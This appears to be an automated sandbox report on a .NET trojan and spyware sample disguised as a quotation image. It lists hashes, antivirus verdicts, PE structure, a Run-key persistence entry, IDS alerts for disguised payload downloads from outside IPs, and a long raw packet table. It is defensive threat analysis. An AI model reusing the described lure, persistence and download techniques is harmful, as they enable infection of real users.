                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ____RM quotation_JPEG IMAGE.img.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/2@3/3
                        EGA Information:
                        • Successful, ratio: 83.3%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 438
                        • Number of non-executed functions: 35
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target InstallUtil.exe, PID 5500 because it is empty
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: RFQ____RM quotation_JPEG IMAGE.img.exe
                        Time | Type | Description
                        03:58:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gydvapkca C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        03:58:03 | API Interceptor | 12691963x Sleep call for process: InstallUtil.exe modified
                        03:58:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gydvapkca C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Process:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):35328
                        Entropy (8bit):5.843001466418759
                        Encrypted:false
                        SSDEEP:768:hv2b4c1Jq7JN32aZzxya2sKE0HMN6G8jrWz0hsg4spg+:h0457JNHosn0GAvWz0uxB+
                        MD5:C3490999B5E36705B9B2ABB2A3ED08C1
                        SHA1:F6AF8F800B5E86D12EA5A1A5567DA493D0C816B3
                        SHA-256:8F2DD3233B7B97265BCDFC1053875652D9F9012D3716DE034F73B5CAADD78D7B
                        SHA-512:4E0FAC9AA28DBA4129E1C35CCB14A2CDE1562D62F3FD920F490CC28B1C875DF54911DC497C5748772DCF3F06A33F68CE9A87EBD1C7DF585C05A1C952635531A8
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 63%
                        Reputation:low
                        Process:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):5.843001466418759
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:RFQ____RM quotation_JPEG IMAGE.img.exe
                        File size:35'328 bytes
                        MD5:c3490999b5e36705b9b2abb2a3ed08c1
                        SHA1:f6af8f800b5e86d12ea5a1a5567da493d0c816b3
                        SHA256:8f2dd3233b7b97265bcdfc1053875652d9f9012d3716de034f73b5caadd78d7b
                        SHA512:4e0fac9aa28dba4129e1c35ccb14a2cde1562d62f3fd920f490cc28b1c875df54911dc497c5748772dcf3f06a33f68ce9a87ebd1c7df585c05a1c952635531a8
                        SSDEEP:768:hv2b4c1Jq7JN32aZzxya2sKE0HMN6G8jrWz0hsg4spg+:h0457JNHosn0GAvWz0uxB+
                        TLSH:BBF2EA2C1BD8CA63CA9F19B8A6B391011771D367F443F74B5BA0D2B1A6277CB0D21197
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x409f8e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F498AD [Wed Sep 25 23:11:41 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9f34 | 0x57 | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x580 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0x7f94 | 0x8000 | 67bd0c036e53f52e4006ece0c4cc8226 | False | 0.510986328125 | data | 5.9512691827204325 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xa000 | 0x580 | 0x600 | d0cbf1f3306eef609d1dee53fb0fea69 | False | 0.4173177083333333 | data | 4.419897595758129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xc000 | 0xc | 0x200 | 0c4ea6f1598c429832f3e46ceede309c | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_VERSION | 0xa0a0 | 0x32c | data | | | 0.4211822660098522
                        RT_MANIFEST | 0xa3cc | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                        DLL | Import
                        mscoree.dll | _CorExeMain
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-09-26T09:57:59.328439+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
                        2024-09-26T09:57:59.328439+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
                        2024-09-26T09:58:02.914824+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:03.945997+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:04.501438+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:06.961661+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49708 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:07.546643+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:12.351328+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49712 | TCP
                        2024-09-26T09:58:12.351328+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49712 | TCP
                        2024-09-26T09:58:17.258472+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49719 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:18.086608+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49719 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:18.647214+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:19.383486+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:19.659022+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49730 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:20.390717+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49732 | TCP
                        2024-09-26T09:58:20.390717+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.5 | 49732 | TCP
                        2024-09-26T09:58:24.789748+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:25.696094+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:26.236139+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49744 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:27.196006+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP
                        2024-09-26T09:58:36.205264+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49755 | 188.114.96.3 | 443 | TCP
                        2024-09-26T09:58:38.967275+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49757 | 188.114.96.3 | 443 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Sep 26, 2024 09:58:00.089381933 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.089396954 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.089404106 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.089446068 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.089476109 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.089580059 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.089632988 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.089668989 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.089730978 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.089979887 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090039015 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090044022 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090054035 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090091944 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090112925 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090121984 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090178967 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090248108 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090301991 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090497017 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090549946 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090603113 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090656996 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090771914 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090820074 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.090867996 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.090919018 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.112709999 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.112767935 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.112859011 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.112869024 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.112881899 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.112911940 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176336050 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.176507950 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.176541090 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176553011 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.176575899 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176606894 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176676989 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.176753044 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176805973 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.176879883 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.176964045 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177037954 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177067995 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177129030 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177135944 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177150011 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177189112 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177203894 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177246094 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177258968 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177264929 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177290916 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177304029 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177310944 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177316904 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177345991 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177356958 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177361965 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177383900 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177409887 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177438021 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177488089 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177614927 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177673101 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.177717924 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.177776098 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.199189901 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.199254036 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.199279070 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.199286938 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.199333906 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.262907028 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.262980938 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.262989044 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263012886 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263042927 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263045073 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263060093 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263068914 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263092995 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263103008 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263132095 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263139963 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263159037 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263187885 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263288975 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263360977 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263381004 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263433933 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263642073 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263688087 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263751984 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263807058 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.263847113 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.263894081 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.264020920 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.264079094 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.264117002 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.264168978 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.264327049 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.264385939 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.264482021 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.264542103 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.264624119 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.264673948 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.286128044 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.286179066 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.286252022 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.286264896 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.286303043 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.286315918 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349694014 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349759102 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349853992 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349878073 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349893093 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349905014 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349920988 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349929094 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349951982 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349960089 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.349986076 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.349992037 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.350016117 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.350043058 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.350178957 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.350228071 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.350238085 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.350290060 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351246119 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351288080 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351317883 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351324081 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351336956 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351353884 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351378918 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351380110 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351398945 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351432085 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351443052 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351483107 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351495981 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351505041 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351527929 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351541042 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351587057 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351600885 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351608992 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351624012 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351639032 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351649046 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351653099 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.351674080 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.351692915 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.373933077 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.374018908 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.374100924 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.374119043 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.374130964 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.374154091 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.443416119 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.443574905 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.443581104 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.443613052 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.443641901 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.443665028 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.443747997 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.443818092 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.443902016 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.443985939 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444076061 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444140911 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444226980 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444288969 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444356918 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444427013 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444493055 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444556952 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444628954 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444695950 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444756031 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444820881 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.444883108 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.444960117 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.445019007 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.445086002 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.445153952 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.445225000 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.445255995 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.445316076 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.460287094 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.460419893 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.460427046 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.460443974 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.460474968 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.460501909 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:00.530528069 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.530608892 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.530669928 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:00.530699968 CEST49704443192.168.2.567.212.175.162
